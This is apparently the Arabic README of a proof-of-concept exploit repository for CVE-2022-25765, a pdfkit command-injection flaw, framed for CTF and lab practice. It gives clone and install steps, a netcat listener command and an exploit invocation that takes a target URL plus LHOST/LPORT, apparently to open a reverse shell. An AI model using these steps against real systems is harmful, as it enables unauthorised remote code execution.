
إثبات مفهوم بلغة بايثون لثغرة CVE-2022-25765، وهي ثغرة حقن أوامر في pdfkit، تتيح تنفيذ التعليمات البرمجية عن بُعد عبر توليد ملفات PDF مصممة خصيصًا.
إثبات مفهوم (PoC) لثغرة CVE-2022-25765، والتي تؤثر على الإصدارات المعرضة للخطر من pdfkit.
تم اختباره مع pdfkit 0.8.6.
requestscoloramaتثبيت التبعيات:
pip3 install -r requirements.txt
أو يدويًا:
pip3 install requests colorama
python3 exploit2.py -u <TARGET> -l <LHOST> -p <LPORT>
مثال: شغّل مستمعًا
nc -lvnp 4242
python3 exploit2.py -u http://10.10.10.10 -l 10.10.14.5 -p 4444
استنساخ المستودع:
git clone [email protected]:innocentx0/CVE-2022-25765.git
cd CVE-2022-25765
تثبيت المتطلبات:
pip3 install -r requirements.txt
شغّل إثبات المفهوم ضد هدفك في بيئة المختبر.
CVE-2022-25765 هي ثغرة حقن أوامر في الإصدارات المعرضة للخطر من pdfkit.
ترتبط المشكلة بعدم كفاية تعقيم المدخلات التي يتحكم فيها المستخدم والتي يتم تمريرها إلى عملية توليد ملفات PDF.
صُمم إثبات المفهوم هذا بشكل أساسي لأغراض التعلم وبيئات CTF/المختبرات.
إذا كنت تبحث عن مكان لتجربته، Hack The Box: الجهاز: Precious.
استخدم هذا فقط ضد الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.
لست مسؤولًا عن سوء الاستخدام أو الأضرار الناجمة عن هذا المشروع.
INNOCENTx0